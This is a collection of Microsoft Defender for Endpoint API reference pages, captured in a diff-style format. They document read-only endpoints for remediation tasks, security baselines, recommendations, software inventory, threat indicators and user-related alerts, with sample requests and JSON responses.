-## List a specified remediation activity for (ID)
-
-**URL:** GET: /api/remediationTasks/\{id\}
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs for details.](apis-intro.md)
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|RemediationTasks.Read.All|\'Read Threat and Vulnerability Management vulnerability information\'
-Delegated (work or school account)|RemediationTask.Read.Read|\'Read Threat and Vulnerability Management vulnerability information\'
-
-## Properties
-
-Property (ID)|Data type|Description|Example of a returned value
-:|:|:|:
-Category|String|Category of the remediation activity (Software/Security configuration)|Software
-completerEmail|String|If the remediation activity was manually completed by someone, this column contains their email|Null
-completerId|String|If the remediation activity was manually completed by someone, this column contains their object ID|Null
-completionMethod|String|A remediation activity can be completed "automatically" (if all the devices are patched) or "manually" by a person who selects "mark as completed"|Automatic
-createdOn|DateTime|Time this remediation activity was created|2021-01-12T18:54:11.5499478Z
-Description|String|Description of this remediation activity|Update Microsoft Silverlight to a later version to mitigate known vulnerabilities affecting your devices.
-dueOn|DateTime|Due date the creator set for this remediation activity|2021-01-13T00:00:00Z
-fixedDevices||The number of devices that have been fixed|2
-ID|String|ID of this remediation activity|097d9735-5479-4899-b1b7-77398899df92
-nameId|String|Related product name|Microsoft Silverlight
-Priority|String|Priority the creator set for this remediation activity (High\Medium\Low)|High
-productId|String|Related product ID|microsoft-_-silverlight
-productivityImpactRemediationType|String|A few configuration changes could be requested only for devices that don't affect users. This value indicates the selection between "all exposed devices" or "only devices with no user impact."|AllExposedAssets
-rbacGroupNames|String|Related device group names|[ "Windows Servers", "Windows 11", "Windows 10" ]
-recommendedProgram|String|Recommended program to upgrade to|Null
-recommendedVendor|String|Recommended vendor to upgrade to|Null
-recommendedVersion|String|Recommended version to update/upgrade to|Null
-relatedComponent|String|Related component of this remediation activity (similar to the related component for a security recommendation)|Microsoft Silverlight
-requesterEmail|String|Creator email address|globaladmin@UserName.contoso.com
-requesterId|String|Creator object ID|r647211f-2e16-43f2-a480-16ar3a2a796r
-requesterNotes|String|The notes (free text) the creator added for this remediation activity|Null
-Scid|String|SCID of the related security recommendation|Null
-Status|String|Remediation activity status (Active/Completed)|Active
-statusLastModifiedOn|DateTime|Date when the status field was updated|2021-01-12T18:54:11.5499487Z
-targetDevices|Long|Number of exposed devices that this remediation is applicable to|43
-Title|String|Title of this remediation activity|Microsoft Silverlight
-Type|String|Remediation type|Update
-vendorId|String|Related vendor name|Microsoft
-
-## Example
-
-### Request example
-
-```http
-GET https://api.securitycenter.windows.com/api/remediationtasks/03942ef5-aecb-4c6e-b555-d6a97013844c
-```
-
-### Response example
-
-```json
-{
- "@odata.context": "https://api.securitycenter.windows.com/api/$metadata#RemediationTasks/$entity",
- "id": "03942ef5-aecb-4c6e-b555-d6a97013844c",
- "title": "Update Microsoft Silverlight",
- "createdOn": "2021-02-10T13:20:36.4718166Z",
- "requesterId": "65548a1d-efo0-4a7a-8d19-1b967b5c36f4",
- "requesterEmail": "user1@contoso.com",
- "status": "Active",
- "statusLastModifiedOn": "2021-02-10T13:20:36.4719698Z",
- "description": "Update Silverlight to a later version to mitigate 55 known vulnerabilities affecting your devices. Doing so can help lessen the security risk to your organization due to versions which have reached their end-of-support.",
- "relatedComponent": "Microsoft Silverlight",
- "targetDevices": 18511,
- "rbacGroupNames": [
- "UnassignedGroup",
- "hhh"
- ],
- "fixedDevices": 2866,
- "requesterNotes": "test",
- "dueOn": "2021-02-11T00:00:00Z",
- "category": "Software",
- "productivityImpactRemediationType": null,
- "priority": "Medium",
- "completionMethod": null,
- "completerId": null,
- "completerEmail": null,
- "scid": null,
- "type": "Update",
- "productId": "microsoft-_-silverlight",
- "vendorId": "microsoft",
- "nameId": "silverlight",
- "recommendedVersion": null,
- "recommendedVendor": null,
- "recommendedProgram": null
-}
-```
-
-## See also
--- [Remediation methods and properties](get-remediation-methods-properties.md)-- [List all remediation activities](get-remediation-all-activities.md)-- [List exposed devices of one remediation activity](get-remediation-exposed-devices-activities.md)-- [Microsoft Defender Vulnerability Management](../next-gen-threat-and-vuln-mgt.md)-- [Vulnerabilities in your organization](../tvm-weaknesses.md)
security Get Security Baselines Assessment Configurations https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-security-baselines-assessment-configurations.md
- Title: Get baseline profile configurations
-description: Provides information about the security baselines assessment configurations that pull "Microsoft Defender Vulnerability Management" data. There are different API calls to get different types of data. In general, each API call contains the requisite data for devices in your organization.
------- m365-security-- tier3-- must-keep--- Previously updated : 05/02/2022--
-# List configurations in active baseline profiles
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender Vulnerability Management](../../defender-vulnerability-management/index.yml)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender Vulnerability Management? Learn more about how you can sign up to the [Microsoft Defender Vulnerability Management public preview trial](../../defender-vulnerability-management/get-defender-vulnerability-management.md).
-
-## 1.API description
-
-This API retrieves a list of the configurations being assessed in active baseline profiles.
-
-### 1.1 Parameters
--- Supports OData V4 queries-- OData supported operators:
- - `$filter` on: `id`, `category`, `name`, `CCE`
- - `$top` with max value of 10,000
- - `$skip`
-
-### 1.2 HTTP request
-
-```http
-GET /api/baselineConfigurations
-```
-
-### 1.3 Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-
-### 1.4 Response
-
-If successful, this method returns 200 OK with the list of baseline configurations in the body.
-
-### 1.5 Properties
-
-|Property | Type | Description |
-|:|:|:|
-|uniqueId | String | Identifier for the specific configuration across baseline benchmarks.
-|Id | String | Identifier of the specific configuration in the baseline benchmark.
-|benchmarkName| String | The name of the benchmark.
-|benchmarkVersion| String | The version of the benchmark. May contain operating system details.
-|name | String | The configuration name at it appears in the benchmark.
-|description | String | The configuration description as it appears in the benchmark.
-|category | String | The configuration category as it appears in the benchmark.
-|complianceLevels|String|The compliance level of the benchmark where this configuration appears.
-|`cce`|Int|The CCE for this configuration as it appears in the benchmark.
-|rationale |String|The rationale for this configuration as it appears in the benchmark. For STIG benchmark this isn't supplied for this configuration.
-|source|Array [String]| Array of the registry paths or other locations used to determine the current device setting.
-|recommendedValue|Array [String]|Array of the recommended value for each source returned in the 'source' property array (values returned in the same order as the source property array).
-|remediation|String| The recommended steps to remediate.
-|isCustom|Boolean| True if the configuration is customized, false if not.
-
-## 1.6 Example
-
-### 1.5.1 Request example
-
-```http
-GET https://api.securitycenter.microsoft.com/api/baselineConfigurations
-```
-
-### 1.6.2 Response example
-
-```json
-{
- "@odata.context": " https://api-df.securitycenter.microsoft.com/api/$metadata#BaselineConfigurations ",
- "value": [
- {
- "id": "9.3.9",
- "uniqueId": "CIS_1.4.0-windows_server_2016_9.3.9",
- "benchmarkName": "CIS",
- "benchmarkVersion": "1.4.0-windows_server_2016",
- "name": "(L1) Ensure 'Windows Firewall: Public: Logging: Log dropped packets' is set to 'Yes'",
- "description": "<p xmlns:xhtml=\"http://www.w3.org/1999/xhtml\"> Use this option to log when Windows Firewall with Advanced Security discards an inbound packet for any reason. The log records why and when the packet was dropped. Look for entries with the word <span class=\"inline_block\">DROP</span> in the action column of the log. </p>",
- "category": "Public Profile",
- "complianceLevels": [
- "Level 1 - Domain Controller",
- "Level 1 - Member Server",
- "Level 2 - Domain Controller",
- "Level 2 - Member Server"
- ],
- "cce": "CCE-35116-3",
- "rationale": "<p xmlns:xhtml=\"http://www.w3.org/1999/xhtml\">If events are not recorded it may be difficult or impossible to determine the root cause of system problems or the unauthorized activities of malicious users.</p>",
- "remediation": "<div xmlns:xhtml=\"http://www.w3.org/1999/xhtml\"> <p> <p> To establish the recommended configuration via GP, set the following UI path to <span class=\"inline_block\">Yes</span> : </p> <code class=\"code_block\">Computer Configuration\\Policies\\Windows Settings\\Security Settings\\Windows Firewall with Advanced Security\\Windows Firewall with Advanced Security\\Windows Firewall Properties\\Public Profile\\Logging Customize\\Log dropped packets </code> <p class=\"bold\">Impact:</p> <p> <p>Information about dropped packets will be recorded in the firewall log file.</p> </p> </p> </div>",
- "recommendedValue": [
- "Equals '1'"
- ],
- "source": [
- "hkey_local_machine\\software\\policies\\microsoft\\windowsfirewall\\publicprofile\\logging\\logdroppedpackets"
- ],
- "isCustom": false
- },
- ]
-}
-```
-
-## See also
--- [Export security baselines assessment](export-security-baseline-assessment.md)-- [Get security baselines assessment profiles](get-security-baselines-assessment-profiles.md)
security Get Security Baselines Assessment Profiles https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-security-baselines-assessment-profiles.md
- Title: Security baselines assessment profiles
-description: Provides information about the security baselines assessment profiles APIs that pull "Microsoft Defender Vulnerability Management" data. There are different API calls to get different types of data. In general, each API call contains the requisite data for devices in your organization.
------- m365-security-- tier3-- must-keep--- Previously updated : 05/02/2022--
-# List all security baselines assessment profiles
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender Vulnerability Management](../../defender-vulnerability-management/index.yml)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender Vulnerability Management? Learn more about how you can sign up to the [Microsoft Defender Vulnerability Management public preview trial](../../defender-vulnerability-management/get-defender-vulnerability-management.md).
-
-## 1. Get security baselines assessment profiles
-
-This API retrieves a list of all security baselines assessment profiles created by the organization.
-
-### 1.1 Parameters
--- Supports OData V4 queries.-- OData supported operators:
- - $filter on : id,name, operatingSystem, operatingSystemVersion, status, settingsNumber, passedDevices, totalDevices
- - $top with max value of 10,000.
- - $skip.
-
-### 1.2 HTTP request
-
-```http
-GET:/api/baselineProfiles
-```
-
-### 1.3 Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-
-### 1.4 Properties
-
-|Property | Type | Description |
-|:|:|:|
-|Id | String | Unique identifier for the specific baseline profile.
-|name | String | The profile name.
-|description | String | The profile description.
-|benchmark | String | The profile benchmark.
-|version | String | The profile version.
-|operatingSystem|String|The profile applicable operating system.
-|operatingSystemVersion|String|The profile applicable operating system version.
-|status|Boolean|Indicates whether the profile is active or not
-|complianceLevel|String|The compliance level chosen for the profile.
-|settingsNumber|Int|Number of selected configurations in the profile.
-|createdBy|String|The user that created this profile.
-|lastUpdatedBy|DateTime|The last user to modify this profile.
-|createdOnTimeOffset|DateTime|The date and time the profile was created.
-|lastUpdateTimeOffset|DateTime|The date and time the profile was last updated.
-|passedDevices|Int|The number of devices applicable to this profile that are compliant with all of the profile configurations.
-|totalDevices|Int|Number of devices applicable to this profile.
-
-## 1.5 Example
-
-### 1.5.1 Request example
-
-```http
-GET https://api.securitycenter.microsoft.com/api/baselineProfiles
-```
-
-### 1.6.2 Response example
-
-```json
-{
- "@odata.context": "https:// api.securitycenter.microsoft.com/api/$metadata#Collection(microsoft.windowsDefenderATP.api.PublicBaselineProfileDto)",
- "value":
- [
- {
- "id": "02bcbb9d-d197-479e-811e-1cd5a6f9f8fa",
- "name": "Windows 10 build 1909 CIS profile",
- "description": "important",
- "benchmark": "CIS",
- "version": "1.0.0",
- "operatingSystem": "Windows 10",
- "operatingSystemVersion": "1909",
- "status": true,
- "complianceLevel": "Level 1 (L1) - Corporate/Enterprise Environment (general use)",
- "settingsNumber": 51,
- "createdBy": "user@org.net",
- "lastUpdatedBy": null,
- "createdOnTimestampUTC": "0001-01-01T00:00:00Z",
- "lastUpdateTimestampUTC": "0001-01-01T00:00:00Z",
- "passedDevices": 0,
- "totalDevices": 10
- }
- ]
-}
-```
-
-## See also
--- [Export security baselines assessment](export-security-baseline-assessment.md)-- [Get security baselines assessment configurations](get-security-baselines-assessment-configurations.md)
security Get Security Recommendations https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-security-recommendations.md
- Title: Get security recommendations
-description: Retrieves a collection of security recommendations related to a given device ID.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Get security recommendations
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender Vulnerability Management](../../defender-vulnerability-management/index.yml)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-> Want to experience Microsoft Defender Vulnerability Management? Learn more about how you can sign up to the [Microsoft Defender Vulnerability Management public preview trial](../../defender-vulnerability-management/get-defender-vulnerability-management.md).
----
-Retrieves a collection of security recommendations related to a given device ID.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md)
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|SecurityRecommendation.Read.All|'Read Threat and Vulnerability Management security recommendation information'
-Delegated (work or school account)|SecurityRecommendation.Read|'Read Threat and Vulnerability Management security recommendation information'
-
-## HTTP request
-
-```http
-GET /api/machines/{machineId}/recommendations
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful, this method returns 200 OK with the security recommendations in the body.
-
-## Example
-
-### Request example
-
-Here is an example of the request.
-
-```http
-GET https://api.securitycenter.microsoft.com/api/machines/ac233fa6208e1579620bf44207c4006ed7cc4501/recommendations
-```
-
-### Response example
-
-Here is an example of the response.
-
-```json
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Recommendations",
- "value": [
- {
- "id": "va-_-git-scm-_-git",
- "productName": "git",
- "recommendationName": "Update Git to version 2.24.1.2",
- "weaknesses": 3,
- "vendor": "git-scm",
- "recommendedVersion": "2.24.1.2",
- "recommendationCategory": "Application",
- "subCategory": "",
- "severityScore": 0,
- "publicExploit": false,
- "activeAlert": false,
- "associatedThreats": [],
- "remediationType": "Update",
- "status": "Active",
- "configScoreImpact": 0,
- "exposureImpact": 0,
- "totalMachineCount": 0,
- "exposedMachinesCount": 1,
- "nonProductivityImpactedAssets": 0,
- "relatedComponent": "Git"
- },
-...
-}
-```
-
-## Related topics
--- [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)-- [Defender Vulnerability Management security recommendation](/microsoft-365/security/defender-endpoint/tvm-security-recommendation)
security Get Software By Id https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-software-by-id.md
- Title: Get software by ID
-description: Retrieves a list of software details by ID.
------- m365-security-- tier3-- must-keep--- Previously updated : 04/17/2024--
-# Get software by ID
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
----
-Retrieves software details by ID.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md) for details.
-
-Permission type|Permission|Permission display name
-||
-Application|Software.Read.All|'Read Threat and Vulnerability Management Software information'
-Delegated (work or school account)|Software.Read|'Read Threat and Vulnerability Management Software information'
-
-## HTTP request
-
-```http
-GET /api/Software/{Id}
-```
-
-## Request headers
-
-Name|Type|Description
-||
-Authorization|String|Bearer {token}.**Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful, this method returns 200 OK with the specified software data in the body.
-
-## Example
-
-### Request example
-
-Here's an example of the request.
-
-```http
-GET https://api.security.microsoft.com/api/Software/microsoft-_-edge
-```
-
-### Response example
-
-Here's an example of the response.
-
-```json
-{
- "@odata.context": "https://api.security.microsoft.com/api/$metadata#Software/$entity",
- "id": "microsoft-_-edge",
- "name": "edge",
- "vendor": "microsoft",
- "weaknesses": 467,
- "publicExploit": true,
- "activeAlert": false,
- "exposedMachines": 172,
- "impactScore": 2.39947438
-}
-```
-
-## Related topics
--- [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)-- [Defender Vulnerability Management software inventory](/microsoft-365/security/defender-endpoint/tvm-software-inventory)
security Get Software Ver Distribution https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-software-ver-distribution.md
- Title: List software version distribution
-description: Retrieves a list of your organization's software version distribution
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# List software version distribution
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
----
-Retrieves a list of your organization's software version distribution.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md) for details.
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Software.Read.All|'Read Threat and Vulnerability Management Software information'
-Delegated (work or school account)|Software.Read|'Read Threat and Vulnerability Management Software information'
-
-## HTTP request
-
-```http
-GET /api/Software/{Id}/distributions
-```
-
-## Request headers
-
-|Name|Type|Description
-||||
-|Authorization|String|Bearer {token}.**Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful, this method returns 200 OK with a list of software distributions data in the body.
-
-## Example
-
-### Request example
-
-Here is an example of the request.
-
-```http
-GET https://api.securitycenter.microsoft.com/api/Software/microsoft-_-edge/distributions
-```
-
-### Response example
-
-Here is an example of the response.
-
-```json
-
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Distributions",
- "value": [
- {
- "version": "11.0.17134.1039",
- "installations": 1,
- "vulnerabilities": 11
- },
- {
- "version": "11.0.18363.535",
- "installations": 750,
- "vulnerabilities": 0
- }
- ...
- ]
-}
-```
-
-## Related topics
--- [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)-- [Defender Vulnerability Management software inventory](/microsoft-365/security/defender-endpoint/tvm-software-inventory)
security Get Software https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-software.md
- Title: List software
-description: Retrieves a list of software inventory
------- m365-security-- tier3-- must-keep--- Previously updated : 04/17/2024--
-# List software inventory API
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-## API description
-
-Retrieves the organization software inventory.
-<br>Supports [OData V4 queries](https://www.odata.org/documentation/).
-<br>OData supported operators:
-<br>```$filter``` on: ```id```, ```name```, and ```vendor``` properties.
-<br>```$top``` with max value of 10,000.
-<br>```$skip```.
-<br>See examples at [OData queries with Microsoft Defender for Endpoint](exposed-apis-odata-samples.md).
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md) for details.
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Software.Read.All|'Read Threat and Vulnerability Management Software information'
-Delegated (work or school account)|Software.Read|'Read Threat and Vulnerability Management Software information'
-
-## HTTP request
-
-```http
-GET /api/Software
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful, this method returns 200 OK with the software inventory in the body.
-
-## Example
-
-### Request example
-
-Here is an example of the request.
-
-```http
-GET https://api.security.microsoft.com/api/Software
-```
-
-### Response example
-
-Here is an example of the response.
-
-```json
-{
- "@odata.context": "https://api.security.microsoft.com/api/$metadata#Software",
- "value": [
- {
- "id": "microsoft-_-edge",
- "name": "edge",
- "vendor": "microsoft",
- "weaknesses": 467,
- "publicExploit": true,
- "activeAlert": false,
- "exposedMachines": 172,
- "impactScore": 2.39947438
- }
- ...
- ]
-}
-```
-
-## Related topics
--- [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)-- [Defender Vulnerability Management software inventory](/microsoft-365/security/defender-endpoint/tvm-software-inventory)
security Get Ti Indicators Collection https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-ti-indicators-collection.md
- Title: List Indicators API
-description: Learn how to use the List Indicators API to retrieve a collection of all active Indicators in Microsoft Defender for Endpoint.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# List Indicators API
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-## API description
-
-Retrieves a collection of all active [Indicators](ti-indicator.md).
-
-Supports [OData V4 queries](https://www.odata.org/documentation/).
-
-The OData's `$filter` query is supported on: `application`, `createdByDisplayName`, `expirationTime`, `generateAlert`, `title`, `rbacGroupNames`, `rbacGroupIds`, `indicatorValue`, `indicatorType`, `creationTimeDateTimeUtc`, `createdBy`, `action`, and `severity` properties.
-<br>```$stop``` with max value of 10,000.
-<br>```$skip```.
-
-See examples at [OData queries with Microsoft Defender for Endpoint](exposed-apis-odata-samples.md).
-
-## Limitations
-
-Rate limitations for this API are 100 calls per minute and 1,500 calls per hour.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Get started](apis-intro.md).
-
-|Permission type|Permission|Permission display name|
-||||
-| Application|Ti.ReadWrite|`Read and write Indicators` |
-| Application|Ti.ReadWrite.All|`Read and write All Indicators` |
-| Delegated (work or school account)|Ti.ReadWrite|`Read and write Indicators` |
-
-## HTTP request
-
-```http
-GET https://api.securitycenter.microsoft.com/api/indicators
-```
-
-## Request headers
-
-|Name|Type|Description|
-||||
-|Authorization|String|Bearer {token}. **Required**.|
-
-## Request body
-
-Empty
-
-## Response
-
-If successful, this method returns 200, Ok response code with a collection of [Indicator](ti-indicator.md) entities.
-
-> [!NOTE]
-> If the Application has `Ti.ReadWrite.All` permission, it will be exposed to all Indicators. Otherwise, it will be exposed only to the Indicators it created.
-
-## Example 1
-
-### Example 1 request
-
-Here's an example of a request that gets all indicators.
-
-```http
-GET https://api.securitycenter.microsoft.com/api/indicators
-```
-
-### Example 1 response
-
-Here's an example of the response.
-
-```json
-HTTP/1.1 200 Ok
-Content-type: application/json
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Indicators",
- "value": [
- {
- "id": "995",
- "indicatorValue": "12.13.14.15",
- "indicatorType": "IpAddress",
- "action": "Alert",
- "application": "demo-test",
- "source": "TestPrdApp",
- "sourceType": "AadApp",
- "title": "test",
- "creationTimeDateTimeUtc": "2018-10-24T11:15:35.3688259Z",
- "createdBy": "45097602-1234-5678-1234-9f453233e62c",
- "expirationTime": "2020-12-12T00:00:00Z",
- "lastUpdateTime": "2019-10-24T10:54:23.2009016Z",
- "lastUpdatedBy": TestPrdApp,
- "severity": "Informational",
- "description": "test",
- "recommendedActions": "test",
- "rbacGroupNames": []
- },
- {
- "id": "996",
- "indicatorValue": "220e7d15b0b3d7fac48f2bd61114db1022197f7f",
- "indicatorType": "FileSha1",
- "action": "AlertAndBlock",
- "application": null,
- "source": "TestPrdApp",
- "sourceType": "AadApp",
- "title": "test",
- "creationTimeDateTimeUtc": "2018-10-24T10:54:23.2009016Z",
- "createdBy": "45097602-1234-5678-1234-9f453233e62c",
- "expirationTime": "2020-12-12T00:00:00Z",
- "lastUpdateTime": "2019-10-24T10:54:23.2009016Z",
- "lastUpdatedBy": TestPrdApp,
- "severity": "Informational",
- "description": "test",
- "recommendedActions": "TEST",
- "rbacGroupNames": [ "Group1", "Group2" ]
- }
- ...
- ]
-}
-```
-
-## Example 2
-
-### Example 2 request
-
-Here's an example of a request that gets all Indicators with `AlertAndBlock` action.
-
-```http
-GET https://api.securitycenter.microsoft.com/api/indicators?$filter=action+eq+'AlertAndBlock'
-```
-
-### Example 2 response
-
-Here's an example of the response.
-
-```json
-HTTP/1.1 200 Ok
-Content-type: application/json
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Indicators",
- "value": [
- {
- "id": "997",
- "indicatorValue": "111e7d15b0b3d7fac48f2bd61114db1022197f7f",
- "indicatorType": "FileSha1",
- "action": "AlertAndBlock",
- "application": null,
- "source": "TestPrdApp",
- "sourceType": "AadApp",
- "title": "test",
- "creationTimeDateTimeUtc": "2018-10-24T10:54:23.2009016Z",
- "createdBy": "45097602-1234-5678-1234-9f453233e62c",
- "expirationTime": "2020-12-12T00:00:00Z",
- "lastUpdateTime": "2019-10-24T10:54:23.2009016Z",
- "lastUpdatedBy": TestPrdApp,
- "severity": "Informational",
- "description": "test",
- "recommendedActions": "TEST",
- "rbacGroupNames": [ "Group1", "Group2" ]
- }
- ...
- ]
-}
-```
-
security Get User Related Alerts https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-user-related-alerts.md
- Title: Get user-related alerts API
-description: Retrieve a collection of alerts related to a given user ID using Microsoft Defender for Endpoint.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Get user-related alerts API
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-## API description
-
-Retrieves a collection of alerts related to a given user ID.
-
-## Limitations
-
-1. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md)
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Alert.Read.All|'Read all alerts'
-Application|Alert.ReadWrite.All|'Read and write all alerts'
-Delegated (work or school account) | Alert.Read | 'Read alerts'
-Delegated (work or school account) | Alert.ReadWrite | 'Read and write alerts'
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - The user needs to have at least the following role permission: 'View Data'. For more information, see [Create and manage roles](../user-roles.md).
-> - Response will include only alerts, associated with devices, that the user have access to, based on device group settings (See [Create and manage device groups](../machine-groups.md) for more information)
->
-> Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-## HTTP request
-
-```http
-GET /api/users/{id}/alerts
-```
-
-**The ID is not the full UPN, but only the user name. (for example, to retrieve alerts for user1@contoso.com use /api/users/user1/alerts)**
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization | String | Bearer {token}. **Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful and user exists - 200 OK. If the user does not exist - 200 OK with an empty set.
-
-## Example
-
-### Request
-
-Here is an example of the request.
-
-```http
-GET https://api.securitycenter.microsoft.com/api/users/user1/alerts
-```
security Get User Related Machines https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-user-related-machines.md
- Title: Get user-related machines API
-description: Learn how to use the Get user-related machines API to retrieve a collection of devices related to a user ID in Microsoft Defender for Endpoint.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Get user-related machines API
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
